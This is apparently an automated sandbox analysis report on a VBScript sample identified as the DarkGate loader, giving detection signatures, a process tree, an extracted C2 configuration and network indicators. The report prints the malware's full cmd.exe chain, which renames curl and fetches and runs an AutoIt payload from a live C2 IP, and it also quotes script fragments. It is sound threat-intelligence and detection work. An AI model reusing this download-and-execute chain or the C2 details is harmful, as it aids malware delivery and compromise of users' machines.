Edit tour

Windows Analysis Report
1.vbs

Overview

General Information

Sample Name:	1.vbs
Analysis ID:	1313188
MD5:	317f213abccd88f7b240063e2bf9995d
SHA1:	66e0867a6f86fe25cf6773e58a8ff9ebb34fa36e
SHA256:	82e5409032e3d8d85390982fe99a86aa9f313f3c7b68c1e3fb4541d81fe9e24a
Tags:	darkgatevbs
Infos:

Detection

DarkGate

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected DarkGate

Sigma detected: DarkGate

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Potential malicious VBS script found (suspicious strings)

Uses known network protocols on non-standard ports

C2 URLs / IPs found in malware configuration

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Found decision node followed by non-executed suspicious APIs

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Contains functionality for execution timing, often used to detect debuggers

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Yara detected Keylogger Generic

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

bpzs.exe (PID: 6948 cmdline: bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)

bpzs.exe (PID: 6852 cmdline: bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)

Autoit3.exe (PID: 6116 cmdline: Autoit3.exe szkzjr.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkGate	First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.	No Attribution	https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/ https://decoded.avast.io/janrubin/complex-obfuscation-meh/ https://decoded.avast.io/janrubin/meh-2-2/ https://github.com/telekom-security/malware_analysis/blob/main/darkgate/extractor.py https://github.security.telekom.com/2023/08/darkgate-loader.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

Malware Configuration

Threatname: DarkGate

{"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DarkGate_1	Yara detected DarkGate	Joe Security
00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate_1	Yara detected DarkGate	Joe Security
00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DarkGate_1	Yara detected DarkGate	Joe Security
Process Memory Space: Autoit3.exe PID: 6116	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Autoit3.exe PID: 6116	JoeSecurity_DarkGate_1	Yara detected DarkGate	Joe Security

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: DarkGate

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, CommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, ProcessId: 6764, ProcessName: cmd.exe

Snort Signatures

ET TROJAN DarkGate AutoIt Downloader - Source IP: 94.228.169.143 - Destination IP: 192.168.2.3

Timestamp:	94.228.169.143192.168.2.32351497132048098 09/23/23-08:02:03.355684
SID:	2048098
Source Port:	2351
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: DarkGate {"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}

Multi AV Scanner detection for submitted file

Source: 1.vbs

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for domain / URL

Source: http://94.228.169.143:2351/msibpzszuqi	Virustotal: Detection: 6%			Perma Link
Source: http://94.228.169.143:2351/bpzszuqi	Virustotal: Detection: 6%			Perma Link

Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D3FD00 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	4_2_00007FF7F8D3FD00
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D3FCF0 CryptHashData,	4_2_00007FF7F8D3FCF0
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D3FCA0 CryptAcquireContextA,CryptCreateHash,	4_2_00007FF7F8D3FCA0
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D2486C CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,	4_2_00007FF7F8D2486C

Source:	Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Autoit3.exe, Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: curl.pdb source: bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 94.228.169.143 2351

Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2048098 ET TROJAN DarkGate AutoIt Downloader 94.228.169.143:2351 -> 192.168.2.3:49713

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 2351
Source: unknown	Network traffic detected: HTTP traffic on port 2351 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 2351
Source: unknown	Network traffic detected: HTTP traffic on port 2351 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 2351
Source: unknown	Network traffic detected: HTTP traffic on port 2351 -> 49715

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: http://94.228.169.143

Source: global traffic

HTTP traffic detected: POST /bpzszuqi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 0Host: 94.228.169.143:2351

Source: global traffic

TCP traffic: 192.168.2.3:49713 -> 94.228.169.143:2351

Source: bpzs.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: bpzs.exe.2.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.143

Source: bpzs.exe, 00000005.00000002.383511096.000001CC7755B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2341/msibpzszuqi
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351/
Source: wscript.exe, 00000001.00000003.366588675.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351/F
Source: wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366650857.00000185DFDE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE4A000.00000004.00000020.00020000.00000000.sdmp, 1.vbs	String found in binary or memory: http://94.228.169.143:2351/bpzszuqi
Source: wscript.exe, 00000001.00000002.366889695.00000185E1BA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351/bpzszuqi3?
Source: wscript.exe, 00000001.00000003.366674421.00000185DFDE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366650857.00000185DFDE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351/bpzszuqi~
Source: bpzs.exe, 00000005.00000002.383511096.000001CC77550000.00000004.00000020.00020000.00000000.sdmp, bpzs.exe, 00000005.00000002.383511096.000001CC7755B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351/msibpzszuqi
Source: bpzs.exe, 00000005.00000002.383511096.000001CC77550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351/msibpzszuqiqb
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351/tem
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351Cw
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351O
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351cm
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351pace
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351tem
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.169.143:2351temkw
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://darkgate.com
Source: Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://darkgate.comU
Source: Autoit3.exe	String found in binary or memory: http://go.micr
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Autoit3.exe, 00000006.00000002.384435840.0000000000379000.00000002.00000001.01000000.00000006.sdmp, Autoit3.exe.4.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: bpzs.exe	String found in binary or memory: https://curl.haxx.se/
Source: bpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	String found in binary or memory: https://curl.haxx.se/P
Source: bpzs.exe	String found in binary or memory: https://curl.haxx.se/docs/copyright.html
Source: bpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: bpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: bpzs.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: bpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
Source: bpzs.exe	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
Source: bpzs.exe.2.dr	String found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: Autoit3.exe	String found in binary or memory: https://go.mic
Source: Autoit3.exe	String found in binary or memory: https://go.microso
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Autoit3.exe.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown

HTTP traffic detected: POST /bpzszuqi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 0Host: 94.228.169.143:2351

Source: C:\bpzs\bpzs.exe

Code function: 4_2_00007FF7F8D16A00 malloc,malloc,recv,send,WSAGetLastError,

4_2_00007FF7F8D16A00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 94.228.169.143:2351Accept: /User-Agent: curl
Source: global traffic	HTTP traffic detected: GET /msibpzszuqi HTTP/1.1Host: 94.228.169.143:2351User-Agent: curl/7.55.1Accept: /

Source: Yara match

File source: Process Memory Space: Autoit3.exe PID: 6116, type: MEMORYSTR

System Summary

Potential malicious VBS script found (suspicious strings)

Source:	Initial file: ymhezvoguki="WINHTTP.WinHTTPRequest.5.1"
Source:	Initial file: CreateObject(qcfrjgeqtf).ShellExecute sgaqwhqlaeth, ymhezvoguki2 ,"","",0

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior

Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D289F8	4_2_00007FF7F8D289F8
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D0A162	4_2_00007FF7F8D0A162
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D2B250	4_2_00007FF7F8D2B250
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D07C64	4_2_00007FF7F8D07C64
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D0ED58	4_2_00007FF7F8D0ED58
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D07D82	4_2_00007FF7F8D07D82
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D14556	4_2_00007FF7F8D14556
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D140B4	4_2_00007FF7F8D140B4
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D34958	4_2_00007FF7F8D34958
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D3F140	4_2_00007FF7F8D3F140
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D272F4	4_2_00007FF7F8D272F4
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D3A2C0	4_2_00007FF7F8D3A2C0
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D1CA68	4_2_00007FF7F8D1CA68
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D3DB7C	4_2_00007FF7F8D3DB7C
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D20374	4_2_00007FF7F8D20374
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D11D04	4_2_00007FF7F8D11D04
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D07C6A	4_2_00007FF7F8D07C6A
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D435DC	4_2_00007FF7F8D435DC
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D1E590	4_2_00007FF7F8D1E590
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D07D8C	4_2_00007FF7F8D07D8C
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D07D2D	4_2_00007FF7F8D07D2D
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D40E90	4_2_00007FF7F8D40E90
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D48E54	4_2_00007FF7F8D48E54
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D22F8C	4_2_00007FF7F8D22F8C
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D2175C	4_2_00007FF7F8D2175C
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D07F2C	4_2_00007FF7F8D07F2C
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D10720	4_2_00007FF7F8D10720
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D368C0	4_2_00007FF7F8D368C0
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D158C8	4_2_00007FF7F8D158C8
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E843C	6_3_042E843C
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434940F	6_3_0434940F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434B44A	6_3_0434B44A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436A492	6_3_0436A492
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D7498	6_3_042D7498
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D1594	6_3_042D1594
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436F5C7	6_3_0436F5C7
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436E615	6_3_0436E615
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04327720	6_3_04327720
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434E776	6_3_0434E776
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436F7B7	6_3_0436F7B7
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0	6_3_043437B0
